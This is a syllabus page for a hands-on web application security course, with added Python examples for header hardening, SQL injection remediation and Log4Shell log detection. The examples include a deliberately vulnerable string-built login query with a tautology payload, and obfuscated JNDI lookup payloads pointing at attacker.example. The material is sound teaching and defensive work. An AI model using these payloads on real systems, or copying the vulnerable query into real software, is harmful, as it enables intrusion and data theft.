Highlights
- Understanding Web Applications
- Information Security & Cybersecurity Fundamentals
- Remediating Common Web Application Vulnerabilities
- Introducing WebAppSec Good Practices
- Secure Web App Development Lifecycles & Supporting Tools
- A04 Insecure Design & A02 Cryptographic Failures
- A03 Injection & A10 Server-Side Request Forgery
- A07 ID & Authentication Failures & A01 Broken Access Control
- A05 Security Misconfiguration & A06 Outdated Components
- A08 Integrity Failures & A09 Logging & Monitoring Failures
- Supporting continuous Web Application Security improvements
Course Details
Module 1: Introductions, course overview & starting surveys
- targeted WebAppSec quizzes with instant feedback to activate delegates’ learning
- connecting to & getting familiar with the course’s hands-on Linux lab environment
- previews of Day 1 & Day 2 content to prepare delegates to engage with WebAppSec
Practicals: each delegate will access an individual cloud-hosted Linux VM via RDP or HTTPS
Module 2: Understanding Web Applications
- exploring HTML, Cascading Style Sheets & JavaScript using Modern Web Browsers
- understanding legal, ethical & data protection considerations related to WebAppSec
- inspecting HTTP verbs, headers, cookies & data using Zed Attack Proxy (ZAP)
Practicals: delegates will perform all of this module’s activities in their Linux VM labs
Module 3: Information Security & Cybersecurity Fundamentals
- appreciating the significance of availability, confidentiality & integrity for Web Apps
- performing simulated phishing attacks using the Social-Engineer Toolkit (SET) & the Browser Exploitation Framework (BeEF)
- understanding the meaning of threats, vulnerabilities, exploits, incidents & controls
Practicals: delegates will perform the simulated phishing activities in their Linux VM labs
Module 4: Remediating Common Web Application Vulnerabilities
- identifying & remediating the Clickjacking weakness (missing X-Frame-Options header, or CSP frame-ancestors directive)
- identifying & remediating the Cross-Site Request Forgery (CSRF, also written XSRF) vulnerability
- securing cookies with the HttpOnly & Secure flags
Practicals: delegates will perform all of this module’s activities in their Linux VM labs
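As an added example (not course material), the following Python script performs the two checks this module teaches, clickjacking protection and cookie flags, on a server response's headers and then applies the remediation. The header list and cookie value are constructed for illustration; ZAP's passive scanner reports the same findings when a response is proxied through it.

```python
"""Check an HTTP response for missing clickjacking protection and for
cookies without HttpOnly/Secure, then apply the fixes. Added example, not
course material; the response below is constructed for illustration."""

# Framing is only blocked when X-Frame-Options is DENY/SAMEORIGIN or a CSP
# frame-ancestors directive is present (modern browsers prefer the CSP).
SAFE_XFO = ("DENY", "SAMEORIGIN")

# Constructed vulnerable response: no framing protection, cookie lacks flags.
SAMPLE_VULNERABLE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=3f9a1c; Path=/"),
]


def _cookie_attrs(raw):
    """'session=abc; Path=/; HttpOnly' -> ('session', {'path', 'httponly'})."""
    parts = [p.strip() for p in raw.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit_response(headers):
    """headers: list of (name, value) pairs as the server sends them.
    Returns a list of findings; an empty list means both checks pass."""
    findings = []
    xfo, csp, cookies = "", "", []
    for name, value in headers:
        key = name.lower()
        if key == "x-frame-options":
            xfo = value.strip().upper()
        elif key == "content-security-policy":
            csp = value.lower()
        elif key == "set-cookie":
            cookies.append(value)
    if xfo not in SAFE_XFO and "frame-ancestors" not in csp:
        findings.append("clickjacking: no X-Frame-Options DENY/SAMEORIGIN "
                        "and no CSP frame-ancestors directive")
    for raw in cookies:
        cname, attrs = _cookie_attrs(raw)
        if "httponly" not in attrs:
            findings.append(f"cookie {cname}: missing HttpOnly")
        if "secure" not in attrs:
            findings.append(f"cookie {cname}: missing Secure")
    return findings


def harden_response(headers):
    """Return a copy of headers with the remediations applied. DENY and
    frame-ancestors 'none' are used here; an app that frames its own pages
    would use SAMEORIGIN and 'self' instead."""
    hardened, has_xfo, has_csp = [], False, False
    for name, value in headers:
        key = name.lower()
        if key == "set-cookie":
            _, attrs = _cookie_attrs(value)
            if "httponly" not in attrs:
                value += "; HttpOnly"
            if "secure" not in attrs:
                value += "; Secure"
        elif key == "x-frame-options":
            has_xfo = True
            if value.strip().upper() not in SAFE_XFO:
                value = "DENY"
        elif key == "content-security-policy":
            has_csp = True
            if "frame-ancestors" not in value.lower():
                value = value.rstrip().rstrip(";") + "; frame-ancestors 'none'"
        hardened.append((name, value))
    if not has_xfo:
        hardened.append(("X-Frame-Options", "DENY"))
    if not has_csp:
        hardened.append(("Content-Security-Policy", "frame-ancestors 'none'"))
    return hardened


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_VULNERABLE):
        print("FAIL:", finding)
    print("after hardening:", audit_response(harden_response(SAMPLE_VULNERABLE)))
```

Run it and the vulnerable response yields three findings (clickjacking, missing HttpOnly, missing Secure); the hardened copy yields none.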
Module 5: Introducing WebAppSec Good Practices
- introducing OWASP & the OWASP Top 10 list of Web Application Security Risks
- performing Threat Modelling of a Web Application using STRIDE
- understanding relationships between OWASP, CWEs, CVEs, CVSS & MITRE ATT&CK
Practicals: the Threat Modelling group practicals do not rely on the Linux VM labs
Module 6: Secure Web App Development Lifecycles & Supporting Tools
- reviewing 4 leading SSDLC models: Microsoft SDL, OWASP SAMM (formerly OpenSAMM), BSIMM, SAFECode
- understanding the value of OWASP’s Application Security Verification Standard (ASVS)
- considering how DAST tools (like ZAP & Burp Suite) differ from SAST & IAST tools
Practicals: SSDLC activities are not lab-based; the Linux VM labs will be used for ZAP & Burp Suite
Module 7: A04 Insecure Design & A02 Cryptographic Failures
- reinforcing need for Threat Model driven WebAppSec lifecycle (as per Modules 5 & 6)
- demonstrating how TLS protection is undermined by installing an untrusted Root Certificate in the Firefox lab environment
- understanding the WebAppSec design challenges of secure cryptographic key management
Practicals: delegates will perform cryptographic security activities in their Linux VM labs
Module 8: A03 Injection & A10 Server-Side Request Forgery
- appreciating how injection attacks arise from poor separation of data from code & weak input validation
- experiencing the significance of Cross-Site Scripting (XSS) attacks with hands-on examples
- how to identify & mitigate SQL Injection & SSRF vulnerabilities
Practicals: delegates will perform XSS, SQL Injection & SSRF activities in their Linux VM labs
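As an added example (not the course's lab code), the script below shows the data/code separation point with a login query against an in-memory SQLite database: the string-built version accepts a tautology payload and returns every user, while the parameterised version compares the same payload literally and matches nothing. The table, users, password hashes and payload are constructed for illustration.

```python
"""Vulnerable and remediated login queries against an in-memory SQLite
database. Added example, not from the course labs; the table, users and
payload are constructed for illustration."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-a"), ("bob", "hash-b")])
    return conn


def login_vulnerable(conn, username, password_hash):
    """String-built query: attacker-supplied data becomes SQL code."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password_hash = '%s'" % (username, password_hash))
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password_hash):
    """Parameterised query: the driver keeps data and code separate, so the
    payload is only ever compared as a literal string."""
    query = ("SELECT username FROM users WHERE username = ? "
             "AND password_hash = ?")
    return [row[0] for row in conn.execute(query, (username, password_hash))]


# Classic tautology payload; the trailing '--' comments out the password check.
PAYLOAD = "' OR '1'='1' --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))  # every user
    print("safe:      ", login_safe(db, PAYLOAD, "wrong"))        # no match
```

The vulnerable query becomes `... WHERE username = '' OR '1'='1' --' AND password_hash = 'wrong'`, which is true for every row; the same technique applies to any driver's placeholder syntax, and parameterisation (or an ORM that uses it) is the remediation the module teaches.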
Module 9: A07 ID & Authentication Failures & A01 Broken Access Control
- understanding the nature of Identification, Authentication & Access Control
- performing attacks on authentication using spoofing, cookie stealing & hash cracking
- how to design secure Web Apps based on proven Identity & Access Control methods
Practicals: delegates will perform authentication attack activities in their Linux VM labs
Module 10: A05 Security Misconfiguration & A06 Outdated Components
- using legal Open Source Intelligence (OSINT) methods to identify exposed vulnerabilities
- showing how DNS, Shodan & Certificate Transparency records can expose internal assets
- exploring good practices for hardening & patching Web Applications
Practicals: OSINT activities may be performed either using Linux VM labs or own computer
Module 11: A08 Integrity Failures & A09 Logging & Monitoring Failures
- examining the meaning & impacts of software integrity failures
- performing a simulated attack using malicious file upload & insecure deserialisation
- understanding the causes & impacts of the Log4j (Log4Shell, CVE-2021-44228) vulnerability
Practicals: delegates will perform Log4j & Syslog monitoring activities in their Linux VM labs
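As an added example (not course material), the script below is detection logic of the kind the Log4j monitoring practical covers, run over constructed access-log lines: it URL-decodes each line, collapses the `${lower:x}` and `${...:-x}` lookups attackers use to hide the literal `jndi`, and reports the callback scheme for triage. The log lines are constructed, the regexes are a heuristic rather than a full Log4j lookup parser, and Python 3.8+ is assumed.

```python
"""Detect Log4Shell (${jndi:...}) lookup attempts in web server log lines,
including common obfuscations. Added example, not course material; the
log lines are constructed and the regexes are a heuristic."""
import re
from urllib.parse import unquote

# ${lower:j} / ${upper:J} evaluate to the character inside the braces.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*?)\s*\}",
                          re.IGNORECASE)
# ${::-j} and ${env:NOPE:-j} evaluate to the default value after ':-'.
_DEFAULT_VALUE = re.compile(r"\$\{\s*[^${}]*?:-([^${}]*)\}")
# The lookup itself; group 1 is the callback scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)

# Constructed Apache-style access log lines: one benign, four attempts.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 "-"',
]


def normalise(line, max_rounds=10):
    """URL-decode, then collapse nested lookups from the inside out until
    nothing changes (bounded so a pathological line cannot loop forever)."""
    text = unquote(line)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return [(line, scheme)] for every line carrying a jndi lookup; the
    scheme tells the responder what the outbound callback would have done."""
    hits = []
    for line in lines:
        match = _JNDI.search(normalise(line))
        if match:
            hits.append((line, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for line, scheme in scan_lines(SAMPLE_LOG):
        print(f"ALERT scheme={scheme}: {line}")
```

A hit is only an attempt; confirming exploitation means checking the application host for an outbound LDAP/RMI/DNS connection to the named host at that time, which is what the Syslog side of the practical is for.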
Module 12: Supporting continuous Web Application Security improvements
- reflecting on learnings from this course & how to improve WebAppSec within the BBC
- signposting trusted sources of further relevant information about WebAppSec
- completing end-of-course feedback to improve future runs of this course
Practicals: delegates will access online surveys & quizzes to reinforce their learning
Resources:
• Cloud Hosted Ubuntu Linux Virtual Machines – 1 per delegate (up to 10 delegates)
• Selected Kali Linux tools e.g. Social-Engineer Toolkit (SET), Hashcat, BeEF, ZAP
• Selected elements of vulnerable apps e.g. OWASP Juice Shop, DVWA, Google XSS Game & Gruyere
• Selected websites & OSINT sources e.g. OWASP, MITRE, NIST NVD, FIRST CVSS, SAFECode, Shodan
Who should attend
Feedback
4.8 out of 5 average
"We tried to cover a lot of bases here from people who had no experience of SQL injection to people who had very specific questions and Tim balanced that really well in the timeframe." RK, Developer, Secure Web Development, Dec 2022
“JBI did a great job of customizing their syllabus to suit our business needs and also bringing our team up to speed on the current best practices. Our teams varied widely in terms of experience and the Instructor handled this particularly well - very impressive”
Brian F, Team Lead, RBS, Data Analysis Course, April 2022